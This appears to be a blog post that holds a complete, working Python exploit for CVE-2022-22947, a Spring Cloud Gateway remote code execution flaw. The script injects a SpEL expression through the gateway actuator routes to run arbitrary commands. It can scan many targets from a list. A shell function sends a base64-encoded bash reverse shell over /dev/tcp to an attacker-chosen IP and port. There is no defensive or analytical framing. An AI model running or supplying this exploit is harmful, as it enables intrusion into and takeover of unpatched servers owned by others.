CVE-2022-22947 

#CVE-2022-22947:Spring Cloud Gateway 远程代码执行
import requests
import json
import sys
import base64
import argparse
import re


url1='/actuator/gateway/routes/hacktest'
url2='/actuator/gateway/refresh'
url3='/actuator/gateway/routes/hacktest'
url4='/actuator/gateway/routes/hacktest'
url5='/actuator/gateway/refresh'

headers1={
    'Accept-Encoding': 'gzip, deflate',
    'Accept': '*/*',
    'Accept-Language': 'en',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
    'Connection': 'close',
    'Content-Type': 'application/json'
}
headers2={
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded'
}



def poc(uurl,cmd,files):#uurl,cmd,files
    #uurl="http://192.168.56.222:8080"
    # cmd="ls -la"
    cmd = cmd.encode('utf-8')
    cmd = str(base64.b64encode(cmd))
    cmd = cmd.strip('b')
    cmd = cmd.strip("'")
    cmd = 'bash -c {echo,' + cmd + '}|{base64,-d}|{bash,-i}'
    payload = {
        "id": "code",
        "filters": [{
            "name": "AddResponseHeader",
            "args": {
                "name": "Result",
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"" + cmd + "\").getInputStream()))}"
            }
        }],
        "uri": "http://example.com",
        "order": 0
    }


    response1 = requests.post(url=uurl + url1, headers=headers1, data=json.dumps(payload,ensure_ascii=False), json=json,timeout=5,verify=False)

    response2 = requests.post(url=uurl+url2,headers=headers2,timeout=5)
    response3 = requests.get(url=uurl+url3,headers=headers2,timeout=5)
    response4 = requests.delete(url=uurl+url4,headers=headers2,timeout=5)
    response5 = requests.post(url=uurl+url5,headers=headers2,timeout=5)
    c=response3.text
    pattern = r"'([^']*)'" 
    matches = re.findall(pattern,c)  
    for match in matches:  
        result=match[:-2] 
    if files:
        with open(f'{files}','a') as f:
            f.write(result+'\n')
    print(result)

def shell(uurl,ip,prot):
    sh = f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
    data1 = sh.encode('utf-8')
    encoded_data = base64.b64encode(data1)
    encoded_sh = encoded_data.decode('utf-8')  

    shel = 'bash -c {echo,123}|{base64,-d}|{bash,-i}'
    cmd = shel.replace("123", encoded_sh)


    payload = {
        "id": "code",
        "filters": [{
            "name": "AddResponseHeader",
            "args": {
                "name": "Result",
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\"" + cmd + "\").getInputStream()))}"
            }
        }],
        "uri": "http://example.com",
        "order": 0
    }

    response1 = requests.post(url=uurl+url1,headers=headers1,data=json.dumps(payload,ensure_ascii=False),json=json,timeout=5,verify=False)
    response2 = requests.post(url=uurl + url2, headers=headers2)
    response3 = requests.get(url=uurl + url3, headers=headers2)
    response4 = requests.delete(url=uurl + url4, headers=headers2)
    response5 = requests.post(url=uurl + url5, headers=headers2)



def main():
    parser=argparse.ArgumentParser('''
            验证单个目标:
                    1、python CVE-2022-22947-exp.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
                    2、python CVE-2022-22947-exp.py  -u http://example.com -c whoami
                验证多个目标
                    1、python CVE-2022-22947-exp.py -t url.txt ,将需要验证的目标全部放在exp同一目录下
                导出结果到文档
                    1、python CVE-2022-22947-exp.py -u http://example.com -c whoami  // -t url.txt -f result.txt ,将结果导出到指定文件
                反弹shell
                    1、python CVE-2022-22947-exp.py  -u http://example.com -i 192.168.1.1 -p 1234
            ''')
    parser.add_argument('-c','--cmd',dest='cmd',help='输入命令')
    parser.add_argument('-u','--url',dest='url',help='输入url')
    parser.add_argument('-t','--txt',dest='txt',help='请输入批量验证的文本名称')
    parser.add_argument('-f','--files',dest='files',help='请输入结果导出的文本名称')
    parser.add_argument('-p','--prot',dest='prot',help="输入反弹端口")
    parser.add_argument('-i','--ip',dest='ip',help='输入反弹ip')
    parser.add_argument('-j', '--jj', dest='jj', help='输入反弹ip')
    parser.add_argument('-V','--version',action='version',version='%(prog)s xiaoxin 1.0')
    args=parser.parse_args()
    url=args.url
    #cmd=args.cmd+args.jj
    if args.url and args.ip and args.prot:
        shell(url.strip('/'),args.ip,args.prot)
    elif args.url:
        poc(url.strip('/'),args.cmd,args.files)
    elif  args.txt:
        with open(f'{args.txt}','r') as urls:
            for url in urls:
                poc(url.strip().strip('/'),args.cmd,args.files)
    elif args.jj:
        print(args.jj)
    else:
        print("-h 帮助信息")



if __name__ == '__main__':
    main()
posted @ 2023-05-23 18:04  crayonxiaoxin  阅读(134)  评论(0编辑  收藏  举报